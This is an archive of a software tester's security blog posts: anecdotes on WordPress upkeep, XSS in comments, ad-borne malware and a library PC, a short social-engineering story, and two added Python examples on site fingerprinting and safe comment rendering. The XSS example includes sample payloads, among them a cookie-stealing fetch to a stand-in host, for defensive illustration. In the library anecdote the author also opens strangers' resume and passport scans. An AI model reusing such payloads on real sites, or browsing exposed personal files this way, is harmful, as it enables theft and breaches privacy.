Category Archives: Secure things

Security by Luck

Last week I saw the attack vectors of the most popular attack on
WordPress web sites at the moment.
Just two lines.

Was I prepared? Yep.

In my mailbox I had a message that my web site had been updated. It was completely automatic.

I did not even have to press a button. Self service is nice, good service is better. I had the latest version of WordPress running. All minor updates are deployed automatically.

Why did I choose WordPress? For one of my test assignments I had to test a WordPress web site. And I did not want to learn another tool to maintain a web site. Sheer luck.

Last year I got an insistent mail from my host provider that I should upgrade my PHP. The advised version was a safer one.

I dutifully followed the instructions: pressing buttons instead of typing long commands after the prompt. There was nothing scary about it.

How did I select my web site host?
I looked for a provider who provided all kinds of handy services: e-mail, backup, and web site statistics.

“Sheer luck, mate.”
“Really?”
“I compared several providers. The one I chose also focused on companies. If I ever scaled up, I had a company that could help me.”

“Can you be more specific?”

“Sure. I looked for the information on the web site. It was written in a way that I could recommend it to a company.

It also had enough technical background information. That was good for my inner nerd.”

“Wait a minute.”
“Yep.”
“You just told which Content Management System you use for your web site, and that you are using PHP. Are you not exposing too much information?”

“A real hacker can determine this information within seconds. He looks at the source code or uses some plug-ins.
On my smartphone I have Dual HTML Viewer, which is a similar tool.”
“How did you find that mobile tool?”
“#30daysoftesting

You could call it luck. I prefer to bend it.”
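The kind of fingerprinting the dialogue refers to, as an added example that is not part of the original post: a small Python function that pulls the CMS, its version, plugin and theme names and the PHP version out of a single page load, from the same places a viewer of the page source would look. The HTML, the headers and the blog.example hostname are constructed for this example and are not taken from any real site.

```python
import re
from typing import Dict, Optional

# Constructed sample response: HTML body plus a few response headers.
# Nothing here was captured from a real site.
SAMPLE_HEADERS: Dict[str, str] = {
    "Server": "Apache",
    "X-Powered-By": "PHP/7.2.10",
    "Link": '<https://blog.example/wp-json/>; rel="https://api.w.org/"',
}
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta name="generator" content="WordPress 4.9.8" />
<link rel="stylesheet" href="https://blog.example/wp-content/themes/twentyseventeen/style.css?ver=4.9.8">
<script src="https://blog.example/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
<script src="https://blog.example/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.4"></script>
</head><body>Hello</body></html>"""

_GENERATOR = re.compile(r'<meta\s+name="generator"\s+content="WordPress(?:\s+([\d.]+))?"', re.I)
_WP_PATHS = re.compile(r"/wp-(?:content|includes)/")
_PLUGINS = re.compile(r"/wp-content/plugins/([\w-]+)/")
_THEMES = re.compile(r"/wp-content/themes/([\w-]+)/")
_PHP = re.compile(r"PHP/([\d.]+)")


def fingerprint(html: str, headers: Dict[str, str]) -> Dict[str, object]:
    """Return what a visitor can infer about the stack from one page load."""
    result: Dict[str, object] = {
        "cms": None,
        "cms_version": None,
        "php_version": None,
        "plugins": [],
        "themes": [],
    }

    # 1. The generator meta tag is the most explicit signal, but it is optional
    #    and is often removed by "security" plug-ins.
    m = _GENERATOR.search(html)
    if m:
        result["cms"] = "WordPress"
        result["cms_version"] = m.group(1)

    # 2. Even without that tag, the fixed WordPress directory layout and the
    #    REST API link header give the CMS away.
    if _WP_PATHS.search(html) or "/wp-json/" in headers.get("Link", ""):
        result["cms"] = result["cms"] or "WordPress"

    # 3. Plugin and theme directory names leak which components are installed;
    #    each of those has its own update cadence and its own bug history.
    result["plugins"] = sorted(set(_PLUGINS.findall(html)))
    result["themes"] = sorted(set(_THEMES.findall(html)))

    # 4. X-Powered-By is sent when PHP runs with expose_php=On (the default).
    m = _PHP.search(headers.get("X-Powered-By", ""))
    if m:
        result["php_version"] = m.group(1)

    return result


def without_generator(html: str) -> str:
    """Same page with the generator tag removed, to show what that hides (nothing much)."""
    return _GENERATOR.sub("", html)


if __name__ == "__main__":
    print(fingerprint(SAMPLE_HTML, SAMPLE_HEADERS))
    print(fingerprint(without_generator(SAMPLE_HTML), {}))
```

Running the function on the same page with the generator tag removed still returns WordPress as the CMS, because the /wp-content/ and /wp-includes/ paths remain in every page. Hiding the version string is not hiding the CMS; keeping the version current, as the post describes, is what actually removes the known holes.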

No comments please

Seth Godin once gave the advice to turn off comments on a web site. If the blog post were interesting enough, then people would have to refer to it. Free publicity.

This time saver was nice advice for me. Yes, I like good comments. Sorry, I focus on writing.

This year I started to test for XSS, or Cross-Site Scripting, attacks. I basically added information to a web site, which changed its behaviour.

If I add HTML code to a comment, then the comment can be shown in bold or italic. Sometimes it is possible to add an extra feature like a window. This can be used to distribute confidential information to other people. Without their permission.

Having no comments disabled the use of XSS. Luck? Not really.
Seth made me think in another way.
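What the comment example above describes, as an added illustration that is not from the original post: three ways a blog could render a visitor's comment, in Python. The first echoes the comment as typed, so a comment that carries script runs in every other reader's browser; the second escapes everything, which kills the script but also the bold and italic; the third escapes everything and then restores only bare `<b>` and `<i>` tags, which keeps the formatting without reopening the hole. The comments, including the evil.example hostname, are constructed for this example and do not come from any real site.

```python
import html
import re

# Constructed comments, as a visitor might type them into a comment form.
# The second and third carry script; the fourth hides a handler inside a tag
# that a naive "allow <b>" rule would wave through.
COMMENTS = [
    "Great post, <b>really</b> helpful.",
    "<script>fetch('https://evil.example/?c=' + document.cookie)</script>",
    '<img src=x onerror="alert(document.cookie)">',
    "<b onmouseover=alert(1)>bold with a payload</b>",
]


def render_unsafe(comment: str) -> str:
    """Echo the comment as-is: any HTML the visitor typed becomes part of the page."""
    return f"<p>{comment}</p>"


def render_escaped(comment: str) -> str:
    """Escape everything: no formatting for anyone, but no script either."""
    return f"<p>{html.escape(comment, quote=True)}</p>"


# Only these exact escaped tokens are turned back into tags. Because they are
# fixed strings without attributes, nothing a visitor types can smuggle an
# event handler or a different element through them.
_ALLOWED = {
    "&lt;b&gt;": "<b>",
    "&lt;/b&gt;": "</b>",
    "&lt;i&gt;": "<i>",
    "&lt;/i&gt;": "</i>",
}


def render_allowlist(comment: str) -> str:
    """Escape everything, then restore only bare <b>/<i> tags (no attributes)."""
    out = html.escape(comment, quote=True)
    for escaped, tag in _ALLOWED.items():
        out = out.replace(escaped, tag)
    return f"<p>{out}</p>"


# A real tag start followed by a script element, an on* event attribute or a
# javascript: URL. Escaped text has no literal '<' before the tag name, so
# this only fires on markup that a browser would actually interpret.
_ACTIVE = re.compile(r"<script\b|<\w+[^>]*(?:\son\w+\s*=|javascript:)", re.I)


def contains_active_content(rendered: str) -> bool:
    """Does the rendered fragment still carry something that would execute?"""
    return bool(_ACTIVE.search(rendered))


if __name__ == "__main__":
    for c in COMMENTS:
        for name, render in (("unsafe", render_unsafe),
                             ("escaped", render_escaped),
                             ("allowlist", render_allowlist)):
            out = render(c)
            print(f"{name:9} active={contains_active_content(out)!s:5} {out}")
```

The escape-then-restore order matters: restoring first and escaping afterwards would re-escape the tags, and allowing `<b` with a regex instead of the exact token is how the fourth comment's `onmouseover` gets through. For anything richer than bold and italic (links, images) use a maintained HTML sanitizer rather than extending the table by hand. And, as the post says, a blog with no comment form has no such input at all.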

BTW, Seth did advise using comments in the very same blog post.
It is nice to read good things about my blog posts. But for me time is (my) precious.

Don’t be too infectious

One of the criteria for choosing my own web site host was full control over the content of my blog. Even if I had to pay for it.

There are web sites which provide free web sites, SSL and nice domain names. Their business model, or their way to earn money, is advertisements on my web site. Of course I can disable them by paying.

At a security conference a Finnish guy showed how advertisements can be misused. He connected to a web page with a single bad pixel. His system was contaminated within milliseconds. Live on stage.

Reading the right stuff

During one of my visits I saw a familiar computer magazine on the table: “I read it too.”
“It is good,” was the answer. He also works in IT, so I valued his input.

Once I read about WordPress tools. There are a lot which are free. So I scheduled my backups and restricted access with a special tool kit. Sometimes I feel lucky to find easy-to-use tools.

A Case of Bad Luck
Within two days of publishing the first piece of this blog post on the web, I found two annoying items on the web.

Santosh Tuppad had serious concerns about the use of WordPress by hospitals. And Santosh is a good security tester.

Kristine Corbus, another tester, blogged about the misuse of headers in WordPress.

Then I had a story of Troy Hunt lingering in my memory. He used another Software as a Service for his web site.

“You wrote Troy.”
“It is not a city in ancient Greece, which had the first bad encounter with a Trojan horse.”
“Who’s Troy?”
“It’s the guy who reported about the bleeding cloud and the eavesdropping teddy bears. Troy is a security expert I follow by luck.”

Was I lucky?

Losing gracefully

“Han Toan, something has to be tested.”
I got a short briefing, CSV files and decent specifications. A senior tester and I had to test an interface. He started sprinting: opening a CSV file and logging bugs. I froze. No time for writing test cases and reviewing them. I confessed to the tester that I was uncomfortable with the situation. I tested a CSV file, but I was losing gracefully.

Theory and practice revisited

The following text is a translation of a text I found on a Dutch farm:

“Theory is when one knows everything and nothing is right.

Practice is when everything functions and nobody knows why.

In this company theory and practice are combined.

Nothing is right and nobody knows why.”

Learning to win

One evening I was playing Skip-Bo with my wife. My plan was to lose gracefully. So I forced myself to play the wrong cards. Her position in the game improved gradually. She was happy, so was I.

After a while I was holding too many good cards in my hand. There was no way that I could hide them for long. I would either win or lose awkwardly. The last option was worse than the first one.

In the months after this clumsy situation I tried to repeat the steps during other games. What was the first wrong move I made? What were my following strange steps? Based on my observations I was able to extract a single rule, or heuristic, to win.

I think that I might be able to find scientific evidence for my heuristic. But I chose not to, because it worked. That was my goal.

No log in required
During an afternoon session James Bach talked about testing without scripts. He was in a hotel lobby and saw a computer. He described the techniques and heuristics he used to get access to this computer. In the end he succeeded.

I was in the library, killing time by browsing newspaper articles. But that was not exciting after a while. I had an appointment within half an hour. In the meantime there should be something to test. I was still staring at the computer when I remembered the story of James.

The computer environment had two access levels for normal users. A guest could use only basic functions, which were also limited. I did not have a library subscription, which would grant me a time slot to use standard office software and the browser. I could buy a time slot, but that would lower the challenge.

So I started testing the applications. There were many search engines for news and books. Then I noticed that I could open the browser. It did not take me much time to go to the download area. A document with Resume in the title drew my attention. I expected an error message when I attempted to open the file.

Then I actually opened the file. I had access to Word. And to personal data like name, address, birthday, .... I got more information than I had anticipated.

It was time to inform the information desk about this particular situation. One of the women acted adequately:
“Did you log in?”
“No. I did not log in.”
One brief look at the computer screen made her check the other computers in the library. She asked me for the steps to reproduce the error. After my answer she continued with:
“After logging out the cache should be cleared. I’ll contact the system administrator about this situation.”

I went back to the computer, which still showed the resume. I closed it. Then I noticed that a PDF reader had been installed on the PC. One of the recently opened files had passport in its name. One click gave me a high-resolution, full-colour scan of a passport, including the social security number and picture of a fellow citizen.

I had made a little start. To explore an unknown environment. Without a script.

Déjà vu

Story number 1

My wife and I were enjoying the sunset. We had settled ourselves on a bench with cushions on the beach. A waiter came into our view:
“What would you like to drink?”
My wife answered:
“One hot chocolate milk please.”
“With or without whipped cream?”
“Without whipped cream.”
Then it was my turn to order a drink:
“One tea without whipped cream.”
When the waiter went away, my wife remarked something about my joke.

After a few minutes the waiter came back with two hot chocolate milks without whipped cream.
“I did not order this beverage.”
“You ordered a hot chocolate milk without whipped cream.”
“I ordered a tea without whipped cream.”
The waiter was silent for a few moments. Then he offered to bring me a tea.

Story number 2

When I was looking for a parking space for the car, one of my kids said:
“That car has the same colour.”
I said something like “Uh huh”.

I parked the car and my wife left to do some fast shopping. I stayed with the kids. After a few minutes I noticed movement in the rearview mirror. My wife had changed her coat, hair colour and glasses. And she had shopped.

“Something is wrong,” flashed through my mind. I turned around to have a good look. The woman looked me straight in the eyes. She was surprised. Her view shifted to the license plate. Then she looked at me with an apologising smile.

She slowly turned around, looking for her car. Then her eyes fell on a car with the same colour, the same model and the same brand. And off she went.

Breakdown

The waiter and the woman have some things in common: first they used the autopilot (System 1). Then they forced themselves to think (System 2). This leads to the following graph (image: mindful-tester-deja-vu-systems-timeline).

Back to business

The following story is fiction. So enjoy.

Steve was waiting for things to happen. For more than an hour it was just him and his pen. The other stuff was boring: the same people moving on the screens in the same patterns. He noticed that a pizza delivery boy parked his car in the parking lot. He just knew that it was a pizza delivery boy. While many of his colleagues regarded strangers as potential criminals, he just looked and knew.

The young man came to his desk:
“One large pepperoni pizza for Mister Neal.”
“Sorry,” Steve replied. “You are not allowed to deliver, because your delivery is not on the list.”
Then a phone call came in.
“Hi Steve, John here. I forgot to notify you that a pizza would be delivered.”
Steve checked off the following points:

  • It was the internal phone number of John.
  • He had an American accent with a hint of Scottish.
  • He was always late with meal notifications.

“Sure, no problem. One pizza coming up.”
“Fine. I’m hungry.”
Steve thought: “He always is.”
He said to the pizza delivery boy:
“You can go to the 6th floor. Mister Neal is wearing a T-shirt.”
Steve thought: “He always is.”
The young man nodded and entered the elevator.

Outside a car stopped. The same man came to Steve’s desk. Steve looked at the first car, which was still parked outside. There was something wrong. The pizza delivery boy looked genuine.
“He’s real,” flashed through his mind.
Steve asked: “One large pepperoni pizza for Mister Neal?”
“That’s right. Can I deliver the pizza?” in the same voice.
Steve looked at the monitor, which showed the same delivery boy in the elevator.

He looked at the pizza delivery boy.
“I have to write down the delivery time,” he said, while tapping three times on his watch. Three short taps is S in Morse: Social engineering threat. He felt three short vibrations of his watch. Now Steve had three minutes to evaluate the situation before the alarm went off.

In the meantime another pizza delivery boy with the same face had come to his desk:
“One large pepperoni pizza for Mister Neal.”
The same face, the same suit and the same voice.
“He’s not an actor. The body language is that of a reluctant man trying to earn extra money for his studies.”
Steve looked at the two pizza delivery boys standing in front of his desk: they looked like twins.

John was a hungry programmer: he ordered at most two pizzas at a time. Steve recalled that John had ordered just one pizza. He pressed his two palms on the desk to push himself up. This way he concealed two small movements. With his right index finger he pushed the Down The River button. People inside the building could only leave the building: elevators would only go down; doors would only open to the hallway. Etcetera, etcetera. Annoyance crept into Steve’s mind:
“This is the real thing and my intuition failed me for the first time.”

With his left index finger he locked the control panel in front of him. While Steve was standing at ease, he casually placed his right palm on his watch. The watch scanned his palm and vibrated for half a second: the alarm was confirmed. He imagined himself as a concrete wall. Now he had to stall until the backup came. The guitar music from the opening scene of Pulp Fiction started to play in his head. He defocused to get a better view of the situation. This way he could see the two pizza delivery boys and the entrance at the same time. Then some ten pizza delivery boys entered the building, packed with pizza boxes. The trumpets in his head began to play louder.